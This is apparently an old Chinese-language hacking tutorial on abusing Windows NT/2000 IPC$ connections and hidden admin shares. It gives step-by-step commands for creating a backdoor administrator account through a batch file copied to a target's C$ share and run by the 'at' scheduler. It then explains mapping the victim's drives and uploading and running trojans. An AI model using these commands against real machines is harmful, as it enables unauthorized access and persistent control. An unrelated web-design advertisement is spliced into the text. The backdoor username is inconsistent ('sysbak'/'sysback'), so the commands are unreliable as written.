IPC$(Internet Process Connection)是共享"命名管道"的資源，它是為了讓進(jìn)程間通信而開放的命名管道，通過提供可信任的用戶名和口令，連接雙方可以建立安全的通道并以此通道進(jìn)行加密數(shù)據(jù)的交換，從而實現(xiàn)對遠(yuǎn)程計算機(jī)的訪問。IPC$是NT/2000的一項新功能，它有一個特點，即在同一時間內(nèi)，兩個IP之間只允許建立一個連接。NT/2000在提供了ipc$功能的同時，在初次安裝系統(tǒng)時還打開了默認(rèn)共享，即所有的邏輯共享(c$,d$,e$……)和系統(tǒng)目錄winnt或windows(admin$)共享。所有的這些，微軟的初衷都是為了方便管理員的管理，但在有意無意中，導(dǎo)致了系統(tǒng)安全性的降低。
（1）為了配合IPC共享工作，Windows操作系統(tǒng)（不包括Windows 98系列）在安裝完成后，自動設(shè)置共享的目錄為：C盤、D盤、E盤、ADMIN目錄（C:\WINNT\）等，即為ADMIN$、C$、D$、E$等等，但要注意，這些共享是隱藏的，只有管理員能夠?qū)λ麄冞M(jìn)行遠(yuǎn)程操作。在MS-DOS中鍵入“net share”命令來查看本機(jī)共享資源。
（2）DOS的基本命令
DIR命令：列出當(dāng)前路徑下的文件，常常用來查看想要找的文件是否在該路徑下。

江夏網(wǎng)站制作公司哪家好，找創(chuàng)新互聯(lián)公司！從網(wǎng)頁設(shè)計、網(wǎng)站建設(shè)、微信開發(fā)、APP開發(fā)、成都響應(yīng)式網(wǎng)站建設(shè)等網(wǎng)站項目制作，到程序開發(fā)，運(yùn)營維護(hù)。創(chuàng)新互聯(lián)公司公司2013年成立到現(xiàn)在10年的時間，我們擁有了豐富的建站經(jīng)驗和運(yùn)維經(jīng)驗，來保證我們的工作的順利進(jìn)行。專注于網(wǎng)站建設(shè)就選創(chuàng)新互聯(lián)公司。

CD命令：進(jìn)入指定的目錄。比如，想進(jìn)入E盤中的CODE文件夾，則在E:\>下鍵“CD CODE”命令。

常用的net命令：
net user：系統(tǒng)賬號類操作
net localgroup：系統(tǒng)組操作
net use：遠(yuǎn)程連接、映射操作
net time：查看遠(yuǎn)程主機(jī)系統(tǒng)時間
cls命令：清屏命令
netstart 命令：

（3）建立和斷開IPC$連接

留后門賬號
1、相關(guān)知識
①、什么是BAT文件？
BAT文件是在Windows系統(tǒng)中的一種文件格式，稱為批處理文件。簡單來說，就是把需要執(zhí)行的一系列DOS命令按順序先后寫在一個后綴名為BAT的文本文件中。通過鼠標(biāo)雙擊或DOS命令執(zhí)行該BAT文件，就相當(dāng)于執(zhí)行一系列DOS命令。
②、什么是計劃任務(wù)？
舉個例子，假設(shè)想在明天上午10點給電腦殺毒，但是正好明天上午10點要出去辦事，那怎么辦呢？這時候就要使用“計劃任務(wù)”這個功能，令計算機(jī)在明天上午10點自動執(zhí)行殺毒程序。計劃任務(wù)是Windows系統(tǒng)自帶的功能，可以在控制面板中找到。除此之外，還可能用命令行的方式來添加計劃任務(wù)。
③、相關(guān)DOS命令
copy命令：把一個文件拷貝到另一個地方，“另一個地方”可以是本地計算機(jī)的目錄、磁盤，也可以是另一臺主機(jī)的目錄或磁盤。
at命令：用來建立計劃任務(wù)。
net time命令：用來查看目標(biāo)計算機(jī)的系統(tǒng)時間，以便使用計劃任務(wù)指定時間。
net user命令：用來管理計算機(jī)上面的賬號。
　　— 查看賬號命令：net user
　　— 建立賬號命令：net user name passwd /add
　　— 刪除賬號命令：net user name passwd /del
net localgroup命令：用來管理工作組。
2、實例：建立后門賬號
步驟一：編寫B(tài)AT文件。
　　打開記事本，鍵入“net user sysbak 123456 /add”和“net localgroup administrators sysback /add”命令，編寫好命令后，把該文件另存為“hack.bat”。下面對這兩個命令進(jìn)行說明。
命令一：net user sysbak 123456 /add。該命令表示添加用戶名為sysback，密碼為123456的賬號。
參數(shù)說明：
　　　　“sysback”：用戶名
　　　　“123456”：用戶的密碼
　　　　“/add”：表示添加賬號
命令二：net localgroup administrators sysback /add。該命令表示把sysback添加到管理員組（administrators）。
　　參數(shù)說明：
　　　　“administrators”：表示管理員組
　　　　“sysback”：剛建立的用戶名
　　　　“/add”：表示添加賬號
步驟二：與目標(biāo)主機(jī)建立IPC$連接。
使用命令：Net use \ip\ipc$ /user:用戶名 密碼
步驟三：拷貝文件至目標(biāo)主機(jī)。
　　使用命令：copy FILE \IP\PATH
　　參數(shù)說明：
　　　　“FILE”表示本地的文件名
　　　　“IP”為目標(biāo)主機(jī)的IP地址
　　　　“PATH”保存文件的路徑
打開MS-DOS，鍵入“copy d:\hack.bat \192.168.27.128\c$”命令copy命令執(zhí)行成功后，就已經(jīng)把D盤下的hack.bat文件拷貝到192.168.27.128的C盤內(nèi)。此外，也可以在圖形界面下把hack.bat復(fù)制、粘貼到目標(biāo)主機(jī)中。
步驟四：通過計劃任務(wù)使遠(yuǎn)程主機(jī)執(zhí)行hack.bat文件。
首先鍵入“net time \IP”命令查看遠(yuǎn)程主機(jī)的系統(tǒng)時間，再鍵入“at \IP TIME COMMAND”命令在遠(yuǎn)程主機(jī)上建立計劃任務(wù)。
　　參數(shù)說明：
　　　　IP：目標(biāo)主機(jī)IP
　　　　TIME：設(shè)定計劃任務(wù)執(zhí)行的時間
　　　　COMMAND：計劃任務(wù)要執(zhí)行的命令
打開MS-DOS，鍵入“net time \192.168.27.128”命令。假設(shè)回顯的目標(biāo)系統(tǒng)時間為13:33，然后根據(jù)該時間為遠(yuǎn)程主機(jī)建立計劃任務(wù)。鍵入“at\192.168.27.128 13:45 c:\hack.bat”命令，該命令表示在下午13點45分執(zhí)行目標(biāo)主機(jī)C盤中的hack.bat文件。計劃任務(wù)添加完畢后，使用命令“net use * /del”斷開IPC$連接。
步驟五：驗證賬號是否成功建立。等待一段時間后，估計遠(yuǎn)程主機(jī)已經(jīng)執(zhí)行了hack.bat文件。下面通過建立IPC$連接來驗證是否成功建立“sysback”賬號。連接成功！說明管理員賬號“sysback”已經(jīng)成功建立。

結(jié)論：
（1）打開目標(biāo)IPC$：
首先你需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴(kuò)展、telnet、***。當(dāng)然，這shell必須是admin權(quán)限的。然后你可以使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)的ipc$。從上一問題可以知道，ipc$能否使用還有很多條件。請確認(rèn)相關(guān)服務(wù)都已運(yùn)行，沒有就啟動它（不知道怎么做的請看net命令的用法）。還是不行的話（比如有防火墻，殺不了）建議放棄。
（2）映射和訪問默認(rèn)共享：
使用命令 net use z: \目標(biāo)IP\c$ "密碼" /user:"用戶名" 將對方的c盤映射為自己的z盤，其他盤類推。 如果已經(jīng)和目標(biāo)建立了ipc$，則可以直接用IP加盤符加$訪問。比如 copy muma.exe
\IP\d$\path\muma.exe 。或者再映射也可以，只是不用用戶名和密碼了：net use y: \IP\d$ 。然后 copy muma.exe y:\path\muma.exe 。當(dāng)路徑中包含空格時，須用""將路徑全引住。
（2）連接上IPC$后：
能使用管理員權(quán)限的帳號成功和目標(biāo)連接ipc$，表示你可以和對方系統(tǒng)做深入“交流”了。你可以使用各種命令行方式的工具（比如pstools系列、Win2000SrvReskit、telnethack等）獲得目標(biāo)信息、管理目標(biāo)的進(jìn)程和服務(wù)等。如果目標(biāo)開放了默認(rèn)共享（沒開你就幫他開），你就可以上傳***并運(yùn)行。也可以用tftp、ftp的辦法上傳。像dwrcc、VNC、RemoteAdmin等工具（***）還具有直接控屏的功能。如果是2000server， 還可以考慮開啟終端服務(wù)方便控制。